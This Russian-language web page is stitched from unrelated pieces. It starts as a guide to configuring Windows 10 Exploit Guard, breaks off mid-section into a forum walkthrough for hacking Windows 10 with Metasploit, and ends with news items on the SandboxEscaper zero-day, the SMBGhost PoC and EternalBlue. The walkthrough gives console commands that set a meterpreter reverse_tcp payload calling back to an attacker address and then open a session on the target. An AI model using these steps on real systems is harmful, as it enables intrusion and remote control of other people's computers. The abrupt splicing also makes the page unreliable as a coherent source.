Как настроить Защиту от эксплойтов в Windows 10

Exploit Guard- новая функция безопасности Защитника Windows, которая была впервые представлена Microsoft в Windows 10 Fall Creators Update.

Защита от эксплойтов представляет собой интегрированную версию инструмента Microsoft EMET (Enhanced Mitigation Experience Toolkit), поддержка которого завершится в середине 2018 года.

Защита от использования уязвимостей включена по умолчанию, если активен Защитник Windows. Эта функция является единственной функцией Exploit Guard, которая не требует включения защиты в режиме реального времени.

Данную функцию можно настроить в Центре безопасности Защитника Windows, с помощью групповых политик или команд PowerShell.

Центр безопасности Защитника Windows

Пользователи Windows 10 могут настроить защиту от эксплойтов в Центре безопасности Защитника Windows.

1. Используйте сочетание клавиша Windows + I для запуска приложения “Параметры”.
2. Перейдите в “Обновление и безопасность”, затем выберите пункт “Защитник Windows”.
3. Нажмите кнопку Открыть Центр безопасности Защитника Windows.
4. Выберите панель “Управление приложениями и браузером”.
5. На открывшейся странице выберите ссылку Параметры защиту от эксплойтов.

Все настройки разделены на две категории: Системные параметры и Параметры программ.

На вкладке Системные параметры выводится список всех доступных механизмов защиту с их статусом. В Windows 10 Fall Creators Update доступны следующие защиты:

• Защита потока управления (CFG) — вкл. по умолчанию.
• Предотвращение выполнения данных (DEP) — вкл. по умолчанию.
• Принудительное случайное распределение для образов (обязательный ASLR) — выкл. по умолчанию.
• Случайное распределение выделения памяти (низкий ASLR) — вкл. по умолчанию.
• Проверить цепочки исключений (SEHOP) — вкл. по умолчанию.
• Проверка целостности кучи — вкл. по умолчанию.

Параметры программ дают вам возможность настраивать защиту для отдельных программ и приложений. Данная опция работает аналогично функции исключений в Microsoft EMET для определенных программ. Данная возможность будет особо полезной, если программа ошибочно работает, когда включены определенные защитные модули.

По умолчанию несколько программ добавлены в исключения, в частности svchost.exe, spools.exe, runtimebroker.exe, iexplore.exe и другие основные программы Windows. Обратите внимание, что вы можете переопределить эти исключения, выбрав файлы и нажав кнопку “Редактировать”.

Нажмите ссылку “Добавление программы для индивидуальной настройки”, чтобы добавить приложение в список исключений.

Вы можете установить отдельный статус всех поддерживаемых защит для каждой программы, которую вы добавили в настройках программы. Помимо переопределения системного параметра по умолчанию и принудительного его включения или отключения, существует также возможность установить параметр только для аудита. В последнем случае будет происходить запись событий, которые происходили, если бы статус защиты был включен, в системный журнал Windows.

В списке “Параметры программ” перечислены дополнительные параметры защиты, которые невозможно настроить под системными параметрами, поскольку они настроены для работы только на уровне приложения.

• Защита от произвольного кода (ACG)
• Блокировка образов низкой целостности
• Блокировка удаленных образов
• Блокировка ненадежных шрифтов
• Защита целостности кода
• Отключение точек расширения
• Отключение вызовов системы Win32k
• Не разрешать дочерние процессы
• Фильтрация адресов экспорта (EAF)
• Фильтрация адресов импорта (IAF)
• Имитация выполнения (SimExec)
• Проверка вызовов API (CallerCheck)
• Проверка использования дескриптора
• Проверка целостности зависимостей образа
• Проверка целостности стека (StackPivot)

PowerShell

Вы можете использовать командную строку PowerShell для установки, удаления или изменения списка мер. Доступны следующие команды:

Чтобы просмотреть все защитные меры указанного процесса: Get-ProcessMitigation -Name processName.exe

Чтобы установить защитную меру: Set-ProcessMitigation — — , ,

Область действия: -System или -Name .

Действие: либо -Enable или -Disable .

Мера: название защитной меры. Обратитесь к таблице на сайте Microsoft, чтобы посмотреть список доступных мер. Вы можете отделить несколько мер запятой.

• Set-Processmitigation -System -Enable DEP
• Set-Processmitigation -Name test.exe -Remove -Disable DEP
• Set-ProcessMitigation -Name processName.exe -Enable EnableExportAddressFilterPlus -EAFModules dllName1.dll, dllName2.dll

Импорт и экспорт конфигураций

Конфигурации можно импортировать и экспортировать. Данные операции можно сделать на странице “Параметров защиты эксплойтов” в Центре безопасности Защитника Windows, а также с помощью PowerShell или редактора групповых политик.

Кроме того, конфигурации EMET можно преобразовать для последующего импорта.

Использование настроек защиты от эксплойтов

Вы можете экспортировать конфигурации в приложении “Центр безопасности Защитника Windows”, но не импортировать их. Экспорт добавляет все меры уровня системы и уровня приложения.

Нажмите ссылку “Параметры экспорта” и выберите местоположение для файла .XML с настройками.

Использование PowerShell для экспорта файла конфигурации

1. Откройте Powershell с правами администратора устройства.
2. Запустите команду: Get-ProcessMitigation -RegistryConfigFilePath filename.xml

Измените путь и filename.xml, указав требуемое местоположение и название файла.

Использование PowerShell для импорта файла конфигурации

1. Откройте Powershell с правами администратора устройства.
2. Запустите команду: Set-ProcessMitigation -PolicyFilePath filename.xml

Использование групповых политик для установки файла конфигурации

Вы можете установить файлы конфигураций с помощью редактора групповых политик:

Статья Hack Windows 10 (meterpreter)

Привет всем! В этой небольшой теме я хочу показать очередной способ взлома Windows, на этот раз это Windows 10. После обновления Metasploit в нем появился достаточно любопытный эксплоит (хотя, может он и раньше там был) — regsvr32_applocker_bypass_server

Читайте также:  Plants and zombies linux

Итак, приступим, в терминале, вводим следующие команды:

> msfconsole (запускаем Metaslpoit)

> options (посмотрим доступные настройки эксплойта)

> set payload windows/meterpreter/reverse_tcp

> set LHOST 192.168.0.101 (Ваш локальный адрес)

Если все прошло успешно видим следующее:

То, что я выделил цветом, это команда, которую необходимо ввести в командной строке целевого хоста, для получения сессии meterpreter.

После выполнения команды, в терминале Kali Linux откроется сессия:

> sessions –I 1 (Подключимся к ней)

> ps (Посмотрим список процессов на целевом хосте)

Тестировал я этот способ на реальном ПК с установленной на нем:

В свежей Windows 10 уже обнаружена уязвимость нулевого дня

Независимая ИБ-исследовательница под ником SandboxEscaper опубликовала эксплойт к актуальной версии Windows 10. Уязвимость Планировщика заданий (Task Scheduler) позволяет взломщику получить дополнительные права в системе и открыть файлы с уровнем доступа SYSTEM.

Новость появилась практически одновременно с выпуском очередного пакета обновлений Windows 10. Эксперты CERT/CC подтвердили работоспособность эксплойта на 64- и 32-битных версиях систем с последними патчами, а также Windows Server 2016 и 2019. Пользователей Windows 7 и 8 угроза не коснулась.

Проблема оказалась связана с обратной совместимостью Планировщика заданий, конкретно — с механизмом обработки задач в формате JOB, который использовался еще в Windows XP. Эти файлы разграничивают права пользователей через так называемые списки избирательного управления доступом (discretionary access control lists, DACL). Как выяснилось, в отсутствие этих элементов система снимает ограничения, позволяя любому пользователю работать с данными.

За последний год это уже пятый эксплойт за авторством SandboxEscaper. В августе 2018 года она опубликовала еще одну уязвимость Task Scheduler — ошибка интерфейса ALPC позволяла обычному пользователю получить администраторские привилегии. Далее, в октябре, девушка продемонстировала способ подменять легитимные DLL-библиотеки приложений на скомпрометированные. Третий и четвертый эксплойты, позволявшие читать любые файлы и переписывать данные в уязвимой системе, были опубликованы в декабре.

По словам SandboxEscaper, она обнаружила еще три 0-day для несанкционированного повышения прав и одну уязвимость для выхода из песочницы. Эти баги предлагаются к продаже любым «не-западным» заказчикам. Стоимость каждой бреши — 60 тыс. в неназванной валюте.

Для «червеобразной» уязвимости в Windows 10 опубликован PoC-эксплоит

PoC-эксплоит позволяет повысить привилегии до уровня системы.

Специалисты компании ZecOps продемонстрировали , что уязвимость SMBGhost (CVE-2020-0796) может эксплуатироваться локальным атакующим для повышения своих привилегий на уязвимой системе.

Уязвимость в SMBv3 затрагивает Windows 10 и Windows Server 1903 и 1909. Компания Microsoft исправила ее 12 марта нынешнего года с помощью внепланового обновления безопасности KB4551762. Уязвимость является «червеобразной» и может эксплуатироваться для повышения привилегий на атакуемой системе. Для осуществления атаки на SMB-сервер злоумышленник должен отправить особым образом сконфигурированные пакеты. Для атаки на SMB-клиент атакующий должен заставить жертву подключиться к вредоносному SMB-серверу.

Исследователи уже публиковали PoC-эксплоиты для уязвимости, однако с их помощью можно только вызвать отказ в обслуживании атакуемой системы. PoC-эксплоитов для удаленного выполнения кода пока нет, однако исследователи из ZecOps представили PoC-эксплоит, позволяющий локально повысить свои привилегии до уровня системы.

Исследователи безопасности Даниэль Гарсиа Гутьеррес (Daniel García Gutiérrez) и Мануэль Бланко Параджон (Manuel Blanco Parajón) также опубликовали PoC-эксплоит, позволяющий повысить привилегии до уровня системы.

Исследователи адаптировали эксплоит EternalBlue для Windows 10

Xakep #263. Кредитки в опасности

Название эксплоита EternalBlue, направленного на эксплуатацию уязвимости в протоколе SMB, хорошо знакомо даже рядовым пользователям, ведь именно этот инструмент использовался для распространения шифровальщика WannaCry в мае 2017 года.

Эксплоит был опубликован хакерской группировкой The Shadow Brokers в открытом доступе в апреле текущего года. Хакеры похитили этот и многие другие инструменты у Equation Group – группировки, за которой стоят «правительственные хакеры» из АНБ.

Работу EternalBlue изучали многие компании и специалисты, он уже был включен в состав Metasploit, так что на данный момент хорошо известно, что эксплоит работает против Windows XP, Windows Vista, Windows 7, Windows Server 2003 и Windows Server 2008, причем в некоторых случаях добиться заражения весьма непросто. Также исследователям удалось добиться работы EternalBlue с Windows 8, Windows 8.1 и Windows Server 2012.

Теперь специалисты компании RiskSense, Шон Диллон (Sean Dillon) и Дилан Девис (Dylan Davis) сообщили, что им удалось адаптировать эксплоит для работы с Windows 10.

Исследователи пишут, что их эксплоит работает только для версий младше Windows 10 Redstone 1 (версия от апреля 2016 года) и в системе не должно быть патча MS17-010. Дело в том, что с релизом Windows 10 Redstone 1 был закрыт обход DEP (Data Execution Prevention), который использует EternalBlue. Также выход версии Windows 10 Redstone 2 (Creators Update, апрель 2017 года) закрыл обход ASLR (Address Space Layout Randomization), которым также пользовался эксплоит. Именно поэтому более новые версии Windows 10 неплохо защищены от EternalBlue.

Также специалисты похвастались тем, что сумели сократить код эксплоита на 20% и избавились от необходимости использовать совместно с EternalBlue инструмент DoublePulsar, как это делал WannaCry.